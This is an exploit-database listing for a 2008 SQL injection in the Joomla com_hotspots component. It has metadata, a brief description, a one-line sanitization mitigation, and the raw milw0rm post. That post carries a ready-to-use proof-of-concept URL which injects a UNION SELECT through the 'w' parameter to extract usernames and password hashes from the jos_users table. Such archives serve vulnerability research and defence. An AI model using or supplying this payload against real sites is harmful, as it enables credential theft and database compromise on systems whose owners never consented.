header-logo
Suggest Exploit
vendor:
Component com_hotspots
by:
cOndemned
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Component com_hotspots
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component com_hotspots (w) Remote SQL Injection Vulnerability

A vulnerability exists in Joomla Component com_hotspots (w) which allows an attacker to inject malicious SQL queries via the 'w' parameter in a 'index.php' script. This can be exploited to disclose sensitive information from the database.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Name	:	Joomla Component com_hotspots (w) Remote SQL Injection Vulnerability
Author	:	cOndemned
Data	:	07.10.2008 AD
Greetz	:	sid.psycho, h07, ZaBeaTy, irk4z, Necro, str0ke, t0pP8uZz, TWT, suN8Hclf, 0in and Avantura.... 


PoC		:

	http://[host]/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users--
	
	
	
Just 4 fun
	

# milw0rm.com [2008-10-07]